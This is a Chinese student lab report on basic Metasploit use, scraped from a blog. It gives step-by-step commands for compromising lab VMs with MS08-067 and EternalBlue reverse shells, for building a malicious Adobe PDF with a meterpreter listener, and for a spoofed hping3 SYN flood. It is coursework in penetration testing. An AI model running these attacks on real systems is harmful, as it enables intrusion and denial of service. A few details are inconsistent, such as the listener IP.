1. 程式人生 > >20165306 Exp5 MSF基礎應用

20165306 Exp5 MSF基礎應用

代碼 發送 ack 配置 -a 3.18 har 方式 編號

Exp5 MSF基礎應用

一、實踐概述

1. 實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。實現:

1.1一個主動攻擊實踐

  • ms08-067+windows/shell_reverse_tcp

1.2 一個針對瀏覽器的攻擊

  • ms17_010_eternalblue+generic/shell_reverse_tcp

1.3 一個針對客戶端的攻擊

  • Adobe+windows/meterpreter/reverse_tcp

1.4 成功應用任何一個輔助模塊

  • dos/tcp/synflood(唯一)

2.基礎問題回答

用自己的話解釋什麽是exploit,payload,encode.

  • exploit:測試者利用系統、程序或服務的漏洞進行攻擊的一個過程。
  • payload:攻擊者在目標系統上執行的一段攻擊代碼,該代碼具有反彈連接、創建用戶、執行其他系統命令的功能。
  • encode:一是為了避免使攻擊載荷不能完整運行的“壞字符”,二是為了改變特征碼,幫助攻擊載荷避免被殺軟發現。

二、實驗步驟

任務一 Windows服務滲透攻擊——MS08-067安全漏洞

攻擊機Kali:10.1.1.169

靶機Win2000:10.1.1.154

payload:windows/shell_reverse_tcp

1.攻擊機和靶機改成橋接模式,相互ping通

技術分享圖片

技術分享圖片

2.msfconsole進入控制臺

search ms08-067

查找漏洞

技術分享圖片

3.如上圖,輸入use exploit/windows/smb/ms08_067_netapi指令選擇漏洞

show options查看設置信息

技術分享圖片

set RHOSTS 10.1.1.154設置Win2000 IP

search portscan搜索端口

技術分享圖片

4.如上圖,輸入use auxiliary/scanner/portscan/tcp選擇漏洞

show options查看設置信息

set RHOSTS 10.1.1.154

exploit

技術分享圖片

看到445端口開放

5.輸入use exploit/windows/smb/ms08_067_netapi

show payloads查看可用payload

技術分享圖片

如上圖,輸入set payload windows/shell_reverse_tcp

選擇payload

show options

技術分享圖片

exploit進行攻擊成功

技術分享圖片

任務二 一個針對瀏覽器的攻擊——ms17-010

攻擊機Kali:192.168.43.91

靶機Win7專業版:192.168.43.182

payload:generic/shell_reverse_tcp

1.攻擊機和靶機改成橋接模式,關閉防火墻,相互ping通

技術分享圖片

技術分享圖片

2.msfconsole進入控制臺

search ms17-010查找漏洞

3.如上圖,輸入use exploit/windows/smb/ms17_010_eternalblue指令選擇漏洞

show payloads顯示可用攻擊載荷

技術分享圖片

set payload generic/shell_reverse_tcp選擇攻擊載荷

show options查看配置信息

set LHOSTS 192.168.43.91設置Kali IP

set RHOSTS 192.168.43.182設置Win7 IP

技術分享圖片

exploit進行攻擊成功

技術分享圖片

任務三 一個針對客戶端的攻擊——Adobe

攻擊機Kali:10.1.1.169

靶機WinXPattacker:10.1.1.194

payload:windows/meterpreter/reverse_tcp

1.攻擊機和靶機改成橋接模式,相互ping通

技術分享圖片

技術分享圖片

2.msfconsole進入控制臺

search adobe查找漏洞

技術分享圖片

3.如下圖,輸入use windows/fileformat/adobe_cooltype_sing指令選擇漏洞

show payloads顯示可用攻擊載荷

技術分享圖片

set payload windows/meterpreter/reverse_tcp

set LHOST 10.0.0.169設置Kali IP

set LPORT 5306 設置攻擊端口

技術分享圖片

set FILENAME 5306.pdf設置生成的pdf文件名

exploit

4.開啟一個新終端

cd /root/.msf4/local進入pdf文件保存目錄

cp 5306XYH.pdf /mnt/hgfs/XYH把pdf文件復制到與主機的共享文件夾中,再把pdf從主機拖到winXP

技術分享圖片

5.回到原控制臺

back退出當前模塊

use exploit/multi/handler 進入監聽模塊

set payload windows/meterpreter/reverse_tcp

set LHOST 10.0.0.169 設置kali IP

set LPORT 5306 設置攻擊端口

exploit 開始監聽

技術分享圖片

6.WinXP中打開5306XYH.pdf

技術分享圖片

回到Kali發現回連成功

技術分享圖片

任務四 成功應用任何一個輔助模塊

攻擊機Kali:10.1.1.169

靶機Win7:10.1.1.113

漏洞:dos/tcp/synflood(唯一)

1.攻擊機和靶機改成橋接模式,相互ping通

2.msfconsole進入控制臺

show auxiliary命令顯示所有的輔助模塊以及他們的用途

一眼相中TCP SYN FLOODER

技術分享圖片

3.SYN Flood攻擊原理

  • SYN:同步序列編號(Synchronize Sequence Numbers),是TCP/IP建立連接時使用的握手信號。

  • SYN Flood利用TCP協議缺陷,通過一定的操作破壞TCP三次握手建立正常連接,占用並耗費系統資源,使得被攻擊方資源耗盡,無法及時回應或處理正常的服務請求。

  • 攻擊原理:通常,客戶端在短時間內偽造大量不存在的IP地址,向服務器不斷地發送syn包,服務器回復確認包,在進行第三次握手時,服務器等待客戶的確認,由於源地址是不存在的,服務器需要不斷的重發直至超時,才將此條目從未連接隊列刪除。這些偽造的SYN包將長時間占用未連接隊列,正常的SYN請求不能進去以及被丟棄,目標系統運行緩慢,引起網絡擁堵。

4.Win7下按Ctrl+Alt+Ins啟動任務管理器

技術分享圖片

查看性能,監控CPU的利用率,開啟Wireshark抓包

技術分享圖片

5.Kali中輸入hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113

其中5.3.0.6為偽造源IP,5306為偽造源端口,445為目的端口,10.1.1.113為目的IP

技術分享圖片

6.查看Win7的任務管理器和wireshark抓包結果

如圖,Win7的性能利用率已經達到99%並居高不下。Wireshark抓到的包顯示大量源地址為5.3.0.6,在給靶機win7發送請求連接,進行SYN Flood攻擊。綜上表明已經攻擊成功。

技術分享圖片

7.Kali中按Ctrl+C結束攻擊

技術分享圖片

查看Win7的任務管理器,性能利用率恢復正常。

技術分享圖片

20165306 Exp5 MSF基礎應用